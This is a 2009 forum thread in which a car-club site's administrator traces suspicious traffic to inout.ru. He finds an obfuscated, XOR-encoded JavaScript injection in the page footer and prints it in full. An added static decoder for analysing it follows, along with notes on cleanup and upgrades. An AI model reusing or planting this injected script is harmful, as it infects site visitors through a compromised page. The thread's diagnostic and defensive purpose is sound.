http://inout.ru - Should I be worried?
Posted: Sun Jan 11, 2009 8:40 pm
by dubbers
Noticed whilst the pages were refreshing (slowly) that there was a lot of traffic going to the above webpage (ad provider?). Is this likely to be a hijack of the site?
The whois info looks harmless enough, and the website (above) doesn't look too dodgy. But have the Russians become ad providers for rs246?
Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 12:32 pm
by PhilT
dubbers wrote: Noticed whilst the pages were refreshing (slowly) that there was a lot of traffic going to the above webpage (ad provider?). Is this likely to be a hijack of the site?
This is the third report of suspicious URLs when surfing the site. As far as I can tell the site is secure, so this points the finger at external content (Only GoogleAds, and Audi).
dubbers wrote: The whois info looks harmless enough, and the website (above) doesn't look too dodgy. But have the Russians become ad providers for rs246?
The only way this is possible is if Google has linked through.
What I would suggest is to minimise the Google Ads by clicking this icon at the top of the content
If anybody sees any activity that they are not comfortable with, please email screenshots, logs, etc. to crew@rs246.com.
Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 4:23 pm
by PhilT
Well, I was wrong. I found the source of the issue, and am trying to figure out how it got in.
I know some of you out there are savvy with this, so any feedback appreciated on how this managed to get embedded into the page footer:
Code:
<script Language="JavaScript">eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%3D%73%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%34%3B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d("8wgvmtp$hejcqeca9&NereWgvmtp&:rev$lpih$9$##?lpih$/9$#8wgv#$/$#mtp$hejcqeca9&NereWgvmtp&$#?lpih$/9$#wvg9&lppt>++`mwt)#$/$Iepl*vkqj`,5$/$Iepl*vej`ki,-$.$0-?lpih$/9$#*vmglpvebbmg*vq+p`w*nw&:8+wgv#$/$#mtp:#?`kgqiajp*svmpa,lpih-?8+wgvmtp:");</script>
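Added example, not part of the original post: a static decoder for the two-stage pattern in the script above (a percent-encoded `eval(unescape(...))` stage that defines `d()`, then a `d("...")` argument that `d()` XORs back into markup), so the footer can be inspected without running it in a browser. The function names are hypothetical, and `SAMPLE` is a constructed, shortened input built from two fragments of the posted script.

```javascript
// Static analysis only: the payload is handled as text, never passed to
// eval() or document.write().

// Stage 1: extract the percent-encoded string from eval(unescape("...")).
function decodeStage1(html) {
  const m = /eval\s*\(\s*unescape\s*\(\s*"((?:%[0-9A-Fa-f]{2})+)"/.exec(html);
  if (!m) return null;
  // Decode %XX one byte at a time, as unescape() does for this form.
  return m[1].replace(/%([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Recover the XOR key from the decoded stage-1 source instead of
// hard-coding it (the posted script contains "c=c^4").
function findXorKey(stage1) {
  const m = /\^\s*(\d+)/.exec(stage1);
  return m ? Number(m[1]) : null;
}

// Stage 2: apply the transform d() applies to its argument: XOR every
// character code below 128 with the key, leave the rest unchanged.
function decodeStage2(html, key) {
  const m = /\bd\s*\(\s*"([^"]*)"\s*\)/.exec(html);
  if (!m || key === null) return null;
  return Array.from(m[1], (ch) => {
    const c = ch.charCodeAt(0);
    return String.fromCharCode(c < 128 ? c ^ key : c);
  }).join('');
}

// Returns null for content that does not carry the pattern.
function analyze(html) {
  const stage1 = decodeStage1(html);
  if (stage1 === null) return null;
  const key = findXorKey(stage1);
  return { stage1, key, stage2: decodeStage2(html, key) };
}

// Constructed sample: one fragment of the posted stage-1 string plus the
// first 30 characters of the posted d() argument.
const SAMPLE = '<script Language="JavaScript">eval(unescape(' +
  '"%69%66%28%63%3C%31%32%38%29%63%3D%63%5E%34%3B"));' +
  'd("8wgvmtp$hejcqeca9&NereWgvmtp&:");</script>';

console.log(analyze(SAMPLE));
```

Passing the full footer script to `analyze()` returns the complete markup that the injection writes into the page, which can then be compared against proxy or firewall logs.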
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 4:59 pm
by Nige_RS4
Take a read of this post Phil ...
http://www.jaguarpc.com/forums/showthre ... 067&page=4
You should check ALL index.html, default.php & index.php files for this code.
It suggests your server security has been compromised by a hacker - usually by injecting scripts over FTP?
One of the ISPs I deal with got hacked (over 300 sites were taken down / affected). They implemented SuPHP within a few days to try and restrict this happening again.
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 6:15 pm
by Nige_RS4
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 12, 2009 9:05 pm
by PhilT
That's what I don't understand.... We only allow http through the firewall.
I'm trawling the logs to see if I can find the injection.
RE: Re: http://inout.ru - Should I be worried?
Posted: Tue Jan 13, 2009 12:29 am
by PhilT
Well I found it. The good news is that the only activity that occurred was the injection into the footer.
The good news is I've figured out what it is doing, and have taken steps to limit it happening again. I've yet to find the root cause.
RE: Re: http://inout.ru - Should I be worried?
Posted: Tue Jan 13, 2009 12:33 am
by PhilT
Happened on Christmas day, feckers!!
On Dec 25, 2008 at 06:04 PM the PostNuke code has detected that somebody tried to send information to your site that may have been intended as a hack.
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 19, 2009 1:31 am
by PhilT
Just to let you know that this is now fixed... The code has been fixed.
RE: Re: http://inout.ru - Should I be worried?
Posted: Mon Jan 19, 2009 6:00 pm
by PhilT
To try to minimise further risk, I'm working through some upgrades:
Forum - Done
Gallery - Done
CMS - Pending